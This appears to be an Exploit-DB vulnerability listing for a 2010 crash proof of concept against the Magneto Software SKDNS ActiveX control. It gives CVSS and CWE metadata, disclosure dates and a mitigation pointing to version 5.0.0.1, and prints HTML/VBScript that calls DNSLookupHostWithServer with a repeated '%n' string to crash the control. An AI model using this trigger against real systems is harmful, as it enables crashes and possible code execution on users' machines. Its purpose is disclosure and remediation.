Magneto Software ActiveX Control ICMP Crash POC

vendor:

SKDNS

by:

s4squatch

9,3

CVSS

HIGH

Buffer Overflow

120 (Buffer Copy without Checking Size of Input)

CWE

Product Name: SKDNS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: a:magnetosoft:skdns

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2010

Magneto Software ActiveX Control ICMP Crash POC

This exploit is a proof-of-concept for a buffer overflow vulnerability in the Magneto Software ActiveX Control. The vulnerability is triggered when the DNSLookupHostWithServer function is called with an overly long argument. This causes a crash in the application, potentially allowing for remote code execution.

Mitigation:

Upgrade to the latest version of the Magneto Software ActiveX Control, 5.0.0.1.

Source

Exploit-DB raw data:

<html>
<object classid='clsid:B5ED1577-4576-11D5-851F-00D0B7A934F6' id='target' /></object>
<script language='vbscript'>
'Magneto Software ActiveX Control ICMP Crash POC
'Discovered by:  s4squatch
'Site:  www.securestate.com
'Date Discovered: 02/11/10
'Vendor Notified: 02/02/10 --> NO RESPONSE
'Vendor Notified: 02/11/10 --> NO RESPONSE
'Vendor Notified: 02/17/10 --> NO RESPONSE
'Published 04/13/10
'www:  http://www.magnetosoft.com/products/skdns/skdns_features.htm
'Download:  http://www.magnetosoft.com/downloads/skdns_setup.exe
'SKNetResource.ocx
'Function DNSLookupHostWithServer ( ByVal strHostName As String ,  ByVal strNameServer As String ) As Long
'progid = "SKDNSLib.SKDns"

arg1 = "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"
arg2 = "defaultV"
target.DNSLookupHostWithServer arg1 ,arg2 

</script>

# Exploit-DB Note:
# According to MagnetSoft The exploit has been fixed in the latest version of the software,5.0.0.1.
# The latest version that contains the fix can be downloaded here:
# http://www.magnetosoft.com/www/downloads/win32/skdns_setup.exe